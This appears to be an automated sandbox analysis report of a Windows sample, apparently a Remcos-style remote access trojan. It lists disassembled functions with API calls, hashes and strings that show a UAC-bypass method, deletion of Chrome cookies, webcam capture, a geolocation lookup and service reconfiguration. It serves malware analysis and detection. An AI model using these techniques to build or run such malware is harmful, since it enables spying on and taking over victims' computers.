                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                              • String ID: PgF
                              • API String ID: 2180151492-654241383
                              • Opcode ID: 8005778e5296f2a99c7d365f02c4ed7d33b176b6b7ddea45d04adc7a43fcaf7e
                              • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                              • Opcode Fuzzy Hash: 8005778e5296f2a99c7d365f02c4ed7d33b176b6b7ddea45d04adc7a43fcaf7e
                              • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                              Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                              Download Yara Rule
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                              • _ValidateLocalCookies.LIBCMT ref: 00437B41
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                              • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                              • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                              • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                              • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                              Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                              • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                              • Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                              • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                              Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                              Download Yara Rule
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                              • int.LIBCPMT ref: 0040FC0F
                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                              • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                              • String ID: P[G
                              • API String ID: 2536120697-571123470
                              • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                              • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                              • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                              • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                              Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                              Strings
                              • http://geoplugin.net/json.gp, xrefs: 0041A54E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleOpen$FileRead
                              • String ID: http://geoplugin.net/json.gp
                              • API String ID: 3121278467-91888290
                              • Opcode ID: c5dbe650c2b1e746fdbc2daec530ac84cdca8e5a9277d0c229b6a7b2c13287e2
                              • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                              • Opcode Fuzzy Hash: c5dbe650c2b1e746fdbc2daec530ac84cdca8e5a9277d0c229b6a7b2c13287e2
                              • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                              Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                              • _free.LIBCMT ref: 0044FD29
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 0044FD34
                              • _free.LIBCMT ref: 0044FD3F
                              • _free.LIBCMT ref: 0044FD93
                              • _free.LIBCMT ref: 0044FD9E
                              • _free.LIBCMT ref: 0044FDA9
                              • _free.LIBCMT ref: 0044FDB4
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                              • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                              • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                              Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe), ref: 00406835
                                • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                              • CoUninitialize.OLE32 ref: 0040688E
                              Strings
                              • C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, xrefs: 00406815, 00406818, 0040686A
                              • [+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
                              • [+] before ShellExec, xrefs: 00406856
                              • [+] ShellExec success, xrefs: 00406873
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: InitializeObjectUninitialize_wcslen
                              • String ID: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                              • API String ID: 3851391207-3531247953
                              • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                              • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                              • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                              • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                              Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                              • int.LIBCPMT ref: 0040FEF2
                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                              • String ID: H]G
                              • API String ID: 2536120697-1717957184
                              • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                              • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                              • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                              • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                              Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                              Download Yara Rule
                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                              • GetLastError.KERNEL32 ref: 0040B2EE
                              Strings
                              • [Chrome Cookies not found], xrefs: 0040B308
                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                              • UserProfile, xrefs: 0040B2B4
                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              • API String ID: 2018770650-304995407
                              • Opcode ID: affce56bb21929d7383bdb2dccb574c79b51b4180e8c74c87d019dc2b0b7a2d9
                              • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                              • Opcode Fuzzy Hash: affce56bb21929d7383bdb2dccb574c79b51b4180e8c74c87d019dc2b0b7a2d9
                              • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                              Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                              Download Yara Rule
                              Strings
                              • C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, xrefs: 00406927
                              • Rmc-4NJUM7, xrefs: 0040693F
                              • BG, xrefs: 00406909
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$Rmc-4NJUM7$BG
                              • API String ID: 0-355280248
                              • Opcode ID: 51f1828bc25dd4c0d61216237760cedcfa3e45f86a5da5526d20c461b23c031b
                              • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                              • Opcode Fuzzy Hash: 51f1828bc25dd4c0d61216237760cedcfa3e45f86a5da5526d20c461b23c031b
                              • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                              Function 00419F32 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                              • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                              • Sleep.KERNEL32(00002710), ref: 00419F79
                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: PlaySound$HandleLocalModuleSleepTime
                              • String ID: Alarm triggered$`#v
                              • API String ID: 614609389-3049340936
                              • Opcode ID: b235acc6dc62185f624d205ca418591b0f75406fe2ec0c8e15ad043012baae45
                              • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                              • Opcode Fuzzy Hash: b235acc6dc62185f624d205ca418591b0f75406fe2ec0c8e15ad043012baae45
                              • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                              Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                              Download Yara Rule
                              APIs
                              • __allrem.LIBCMT ref: 00439789
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                              • __allrem.LIBCMT ref: 004397BC
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                              • __allrem.LIBCMT ref: 004397F1
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                              • String ID:
                              • API String ID: 1992179935-0
                              • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                              • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                              • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                              • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                              Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: __cftoe
                              • String ID:
                              • API String ID: 4189289331-0
                              • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                              • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                              • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                              • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                              Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: __freea$__alloca_probe_16
                              • String ID: a/p$am/pm
                              • API String ID: 3509577899-3206640213
                              • Opcode ID: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                              • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                              • Opcode Fuzzy Hash: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                              • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                              Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00403E8A
                                • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: H_prologSleep
                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                              • API String ID: 3469354165-462540288
                              • Opcode ID: c06602ad5b80aab45bf926ea6107a81c7929f47509625bccb2b61e836fe0621c
                              • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                              • Opcode Fuzzy Hash: c06602ad5b80aab45bf926ea6107a81c7929f47509625bccb2b61e836fe0621c
                              • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                              Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                              Download Yara Rule
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                              Memory Dump Source
